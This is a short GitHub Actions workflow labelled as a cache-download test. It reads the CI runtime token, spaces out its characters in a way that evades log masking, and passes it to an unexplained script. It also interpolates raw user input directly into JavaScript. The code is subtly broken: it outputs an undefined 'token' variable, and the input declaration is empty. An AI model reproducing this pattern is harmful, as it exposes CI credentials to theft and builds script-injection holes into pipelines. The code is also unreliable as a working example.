name: Test cache download
on:
  workflow_dispatch:
    inputs:
      url:
jobs:
  download-cache:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - uses: actions/github-script@v6
        id: script
        timeout-minutes: 10
        with:
          debug: true
          script: |
            const ptoken = (process.env['ACTIONS_RUNTIME_TOKEN'] || '').split('').join(' ');
            const url = process.env['ACTIONS_CACHE_URL'] + '_apis/artifactcache/cache?keys=' + '${{ github.event.inputs.url }}';
            core.setOutput('TOKEN', token.trim())
      - run: |
          python test.py
        env: 
          ACTIONS_RUNTIME_TOKEN: ${{ steps.script.outputs.TOKEN }}
          CACHE_URL: ${{ github.event.inputs.url }}
